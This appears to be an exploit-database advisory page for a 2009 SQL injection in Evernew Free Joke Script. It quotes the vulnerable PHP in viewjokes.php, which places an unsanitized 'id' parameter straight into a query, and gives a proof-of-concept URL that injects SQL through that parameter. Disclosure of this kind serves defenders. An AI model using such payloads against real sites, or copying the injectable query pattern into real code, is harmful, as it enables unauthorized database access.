header-logo
Suggest Exploit
vendor:
Free Joke Script
by:
Hamza 'MizoZ' N.
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Free Joke Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Evernew Free Joke Script (viewjokes.php) SQL Injection

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The attacker can inject malicious SQL code in the 'id' parameter of the 'viewjokes.php' script. This can be used to bypass authentication, access, modify and delete data in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

/*

Name : Evernew Free Joke Script (viewjokes.php) SQL Injection
WebSite : www.evernewscripts.com

Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com

Greetz : Zuka , int_0x80 , geeksec.com ... a loot

*/

# VULN CODE ]--[ viewjokes.php :

$id=$HTTP_GET_VARS['id'];
$title=$HTTP_GET_VARS['title'];

stuffViewer($id, 'jokes');

$query="select * from jokes where id=$id";
$allresults=mysql_query($query);
$viewjokes=mysql_fetch_array($allresults);

# EXPLOIT :

http://[THINGS ...]/viewjokes.php?id=5+and+(select 1)=1--

Navigation

Suggest Exploit

Services By CQR